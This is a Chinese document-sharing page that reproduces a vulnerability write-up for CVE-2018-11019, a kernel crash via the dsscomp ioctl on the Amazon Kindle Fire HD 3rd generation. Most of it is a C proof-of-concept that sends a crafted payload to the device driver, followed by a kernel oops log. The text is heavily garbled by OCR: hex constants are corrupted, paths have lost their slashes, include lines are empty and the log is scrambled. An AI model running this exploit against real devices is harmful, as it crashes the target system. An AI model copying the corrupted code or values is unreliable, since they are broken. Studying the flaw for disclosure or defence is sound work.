(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
《(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(10页珍藏版)》请在课桌文档上搜索。
1、(CVE-2018-11019) Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd)是美国亚马逊(AmaZOn)公司的一款 FireOS 平板 电脑设备。Fire OS是运行在其中的一套专用于AmaZOn设备的基于Android开发 的移动操作系统。kernel是其中的一个内核组件。Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3版本中的kernel组件的 kernel/omap/drivers/misc/gcx/gcioctl/gcif.c 文件
2、存在安全漏洞。攻击者可借助 3221773726命令利用该漏洞注入特制的参数,造成内核崩溃。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc /* This is poc of Kindle Fire HD 3rd* A bug in the ioctl interface of device file devdsscomp causes the system crash via IOCTL 1118064517.* Related buggy struct name is dsscomp_setup_dispc_data.* This Poc should run with pe
3、rmission to do ioctl on devdsscomp.* The -Fowllwing is kmsg of kernel crash infomation:* */#include #include #include #include const static char *driver = devdsscomp; static command = 1118064517;int main(int argc, char *argv, char *env) unsigned int payload = Oxffffffffj 0X00000003j 05d200040, 0x799
4、00008, 0x8f5928bd,0x78b02422, 0X00000000j 0ffffffff, 0xf4c50400, 0007fffff, 08499f562, 0ffff0400, 0001bl31dj 0x60818210, 0X00000007, 0ffffffff, 0X00000000 0x9da9041c, 0cd980400, 0001f03f4, 0x00000007, 0x2a34003f, 07c80d8f3, 0x63102627, 0xc73643a8, 0xa28f0665, 0X00000000j 0689e57b4j 0x01ff0008, 0x5e7
5、324bl, 0xae3b003f, 0x0bl74d86, 0X00000400, 0x2Iffff37, 0xceb367a4j 0x00000040, 0x00000001j 0xec000f9ej 000000001, 0x00000Iff, 0X00000000, 000000000, 00000000f 00425c069j 0x038cc3bej 00000000f, 0x00000080, 0xe5790100, 05blbffff, 00000d355, 0x0000c685, 0xa0070000, 00010ffff, 0x00a0ff00, 000000001,0xff
6、490700j 0x0832ad03, 0x00000006 0X00000002, 000000001j 0x81f871C0, 0x738019cbj 0xbf47ffff, 000000040j 0X00000001, x7fl90f33, 0X00000001, 0x8295769b, 0X0000003f, 0x869f2295, 0ffffffffj 0xd673914fj 0x05055800, 0xed69b7d5j 0X00000000, 0xl07ebbd, 0xd214af8dj 0xffff4a93, 0x26450008, 0x58df0000j 0dl6db084j
7、 0x03ff30dd, 0X00000001, 0x209aff3b, 0xe7850800j 0x00000002, 0x30da815cj 0x426f5105, 00del09d7j 02cla65fcj 0fcb3d75f, 0X00000000, 0X00000001, 08066be5b 0X00000002, 0ffffffffj 0x5cf232ecj 0x680dl469, 0X00000001 0X00000020, 0ffffffff, 0X00000400, 0xdldl2be8j 0X02010200, 001ffcl6f,0xf6e237e6, 0x007f000
8、0, 001ff08f8, 0000f00f9j 0xbad07695, 0X00000000j 0xbaff0000, 0x24040040, 0X00000006 0X00000004, 0X00000000, 0xbc2e9242, 0x009f5f08, 0x00800000? 0X00000000j 000000001, 0xff8800ff, 0X00000001, 0X00000000, 0000003f4, 0x6faa8472, 0X00000400j 0ec857dd5, 0x00000000, 0x00000040, 0xffffffff, 0x3f004874, 0x0
9、000b77a, 0xec9acb95, 0xfacc0001 0xffff0001, 00080ffff, 0x3600ff03, 000000001, 0x8fff7d7f, 0x6b87075a, 0X00000000, 0X41414141, 041414141j 041414141, 0x41414141, 0X00100Iff, 0X00000000j 0X00000001j 0fflf0512, 0X00000001j 0x51e32167, 0xcl8c55ccj 0X00000000? 0xffffffff,0xb4aafl2b 0x86edfdbd, 0X00000010,
10、 00000003fj 0abff7b00, 0xffff9ea3j 0xb28e0040, 0x000fffff, 0x458603f4, 0ffff007f, 0xa9030f02, 0X00000001j 0x002Cffff, 09e00cdffj 000000004j041414141, 041414141, 0x41414141, 0x41414141 ;int fd = 0;fd = open(driverj O_RDWR);if (fd datalocaltmplog);return -1;)printf(Try open %s with command 0x%x.n”, dr
11、iver, command); printf(System will crash and reboot.n);if(ioctl(fdj command, Spayload) datalocaltmplog);return -1;close(fd);return 0;崩溃日志164.793151 Unable to handle kernel NULL pointer dereference at virt ual address 00000037164.802459164.805664164.813415164.819458164.8272391)164.834686164.839416pgd
12、 = c26ec00000000037 *pgd=82f42831, *pte=00000000j *ppte=00000000Internal error: Oops: 17 #1 PREEMPT SMP ARMModules linked in: omaplfb(0) pvrsrvkm(O) pvr_logger(0)CPU: 1Tainted: GO (3.4.83-gd2afc0bae69 #PC is at LR is atdev-ioctl+04ac0xl0c4down_timeout+0x40/0x5c164.844146164.844146164.857116164.86312
13、8 0f164.870391 00PC : SP : 0: r7 :r3 :c25ale70 00000000 C0a25b5000001403Ir : psr: 60000013iP r9 r6:c25ale50:d8caca8 :c25a0000:00000000164.877807 Flags: nZCv IRQs on ment userfp : c25alf04r8 : bed5c610r5 : bed5c610 r4 : 000000rl : 20000013 r0 : 000000FIQs on Mode SVC_32 ISA ARM Seg164.885894 Control:
14、 10c5387d Table: 826ec04a DAC: 00000015164.892303164.892333 PC: 0xc0317868:164.897308 7868 30d22003 f02 ela0200d e3c26d7f33a03000e35300000a0001c5e3e0500deafff164.907989 7888 e3c6603f 000 la000021 e24b3064e5963008e295200830d2200333a03000e3530164.918670 78a8 ela01005000 la00001e e51b4060e3a02008e50b30
15、88ela00003ebfcfa5fe3500164.929351 78c8 e3020710 c25 e3500000 Ia0002e0e59f7bdcebf4db32ela010002870038ebf55164.939880 78e8 e5943028 004 e5830000 e5b23070ela08000e5940024ela02007e2841024e5803164.950561 7908 e5871070 bb9 e50b8060 e50b8064e2420038e5831004e5843024e5842028ebf55164.961212 7928 ea000006387 e
16、3a03004 e50b3064e24bl064e50bl088e51b0088e3a01008ebfd0164.971771 7948 e5963008 fc5 ela00005 e51bl088e295200830d2200333a03000e3530000Iafff164.982299164.982330 LR: 0xc006e938:164.987426 e938 ela01000 004 ebl8d7ad ela000050a000007e3a05000e2433001e5843008ela00164.997955 e958 e24bd014 018 ela05000 eafffff
17、4e89da830ela00004e50bl018ebl8dl35e51bl 165.008636 e978 ela0c00d 91b e5943008 e3530000e92dd878e24cb004ela04000ela05001ebl8d165.019317 e998 ela06000 004 ela01006 ebl8d7940a000007e3a05000e2433001e5843008ela00165.029846 e9b8 ela00005000 eafffff5 ela0c00de89da878ela01005ela00004ebl8dl58ela05165.040374 e9
18、d8 e92dd800 00b e5910008 e5932008e24cb004e5903000ela0c000e35300000a000165.051055 e9f8 el500002 003 e283c004 e5933004da000003ea000006e5932008el520000ba000165.061737 eal8 e3530000 000 e89da800 ela0c00d8e5813004f57ff05fe3a00000e58cl165.072265165.072265 SP: 0xc25aldf0:165.077362 ldf0 0000000100000004d45
19、4d0000000001dc25ale3cc03178e8 60000013 ffffffff165.087890 lel c25ale5c 370 00000000 20000013bed5c610c25alf04c25ale28C06a5318C0008165.098419 le30 00000000 b50 bed5c610 d8caca8000014030000000fbed5c610c25a0000C0a25165.109100 le50 00000000 8e8 60000013 ffffffffc25alf04c25ale50c25ale70C006e9b8c0317 165.1
20、19781 le70 00000001 e90 C0207454 C00bd92000000028000fffffc25alea0c25aledcc25al165.130340 le90 0000001e00f 00000000 ffffffffc2db9600c25aled4c25alea8ffffffff00000165.141021 leb 00000002 001 d8c0aca8 d70c55800000000100000000c25alfl40000000000000165.151702 led c25alefc 004 c719ab40 bed5c610c25alee0c0208
21、9fc00000000c719ab4000000165.162353 165.162384 IP: 0xc25aldd0:165.167327 ldd C0070df8 0f4 60000013 00000001c00795acc25a00000000000100000004d454d165.178009 ldf0 000000018e8 60000013 ffffffff00000004d454d0000000001dc25ale3cC0317165.188537 lel0 c25ale5c370 00000000 20000013bed5c610c25alf04c25ale28C06a53
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- CVE-2018-11019Amazon Kindle Fire HD 3rd OS kernel组件安全漏洞 CVE 2018 11019 Amazon rd kernel 组件 安全漏洞
链接地址:https://www.desk33.com/p-641657.html